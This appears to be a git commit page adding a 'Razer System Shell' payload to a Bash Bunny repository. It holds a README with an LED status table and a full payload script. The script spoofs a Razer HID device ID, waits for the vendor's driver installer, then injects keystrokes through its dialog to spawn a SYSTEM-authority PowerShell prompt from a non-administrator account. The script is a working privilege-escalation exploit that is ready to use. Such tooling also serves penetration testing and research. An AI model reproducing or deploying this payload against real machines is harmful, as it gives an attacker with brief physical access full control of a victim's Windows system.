New Payload: Razer System Shell (#463)
Exploit Razer USA HID driver installation to System authority PowerShell. This is heavily based on Tweet by @_MG_ on 22nd Aug 2021 but modified to work with BashBunnypull/464/head
parent
9b86d8c991
commit
9fdacee185
|
@ -0,0 +1,22 @@
|
||||||
|
# Razer System Shell from Bash Bunny
|
||||||
|
|
||||||
|
Author: Emptyhen
|
||||||
|
Version: 0.1
|
||||||
|
|
||||||
|
## Description
|
||||||
|
Makes use of a exploitation that's part of the driver installation process for Razer HID devices. From a low privilege (non administrator account) this code produces a System authority PowerShell prompt.
|
||||||
|
|
||||||
|
There are some long delays built into this payload to allow for the time required to install the drivers and start the Razer Synaptics installation and configuration tool.
|
||||||
|
|
||||||
|
Although this has been designed for the Bash Bunny, it should be compatible with the Key Croc too.
|
||||||
|
|
||||||
|
Note: To run the payload a second time, the Razer driver needs to be removed from Device Manager.
|
||||||
|
|
||||||
|
## STATUS
|
||||||
|
| LED Status | Status |
|
||||||
|
|------------------------|---------------------------------------------------|
|
||||||
|
| PINK | Payload starting and configuring the attack mode. |
|
||||||
|
| ORANGE - Single Flash | Waiting for drivers to be installed. |
|
||||||
|
| ORANGE - Two Flashes | Injecting keystrokes to create the shell. |
|
||||||
|
| ORANGE - Three Flashes | Waiting for PowerShell to launch |
|
||||||
|
| GREEN | Payload finished. |
|
|
@ -0,0 +1,40 @@
|
||||||
|
# Title: Razer System Shell
|
||||||
|
# Description: Exploit Razer USA HID driver installation to System authority PowerShell.
|
||||||
|
# This is heavily based on Tweet by @_MG_ on 22nd Aug 2021 but modified to work with BashBunny
|
||||||
|
# Author: Emptyhen
|
||||||
|
# Props: @_MG_, @Hak5Darren, @KalaniMakutu - Original Concept
|
||||||
|
Cribbit, NightGhost - Great suggestions to clean up the PoC.
|
||||||
|
# Version: 0.1
|
||||||
|
# Category: Execution
|
||||||
|
# Target: Windows 10 (Powershell)
|
||||||
|
# Attackmodes: Serial, HID
|
||||||
|
|
||||||
|
LED SETUP
|
||||||
|
|
||||||
|
# Serial isn't actually used but appears to be required to make the HID work correctly.
|
||||||
|
ATTACKMODE SERIAL HID VID_0X1532 PID_0X0064
|
||||||
|
|
||||||
|
# Long delay to allow the driver installation and wait for the Razer Synaptics to start up.
|
||||||
|
# Note this only happens after the driver is installed - to run this again, remove the Razer HID driver in Device Manager.
|
||||||
|
LED STAGE1
|
||||||
|
QUACK DELAY 40000
|
||||||
|
|
||||||
|
# Inject Keystrokes to Launch a Powershell Window.
|
||||||
|
LED STAGE2
|
||||||
|
QUACK SPACE
|
||||||
|
for run in {1..5}; do QUACK TAB; done
|
||||||
|
QUACK RIGHT
|
||||||
|
QUACK RIGHT
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK ALT D
|
||||||
|
QUACK STRING powershell
|
||||||
|
QUACK ENTER
|
||||||
|
|
||||||
|
# A 'nt autority\system' PowerShell prompt should get spawned.
|
||||||
|
LED STAGE3
|
||||||
|
QUACK DELAY 10000
|
||||||
|
QUACK STRING whoami
|
||||||
|
QUACK ENTER
|
||||||
|
|
||||||
|
LED FINISH
|
Loading…
Reference in New Issue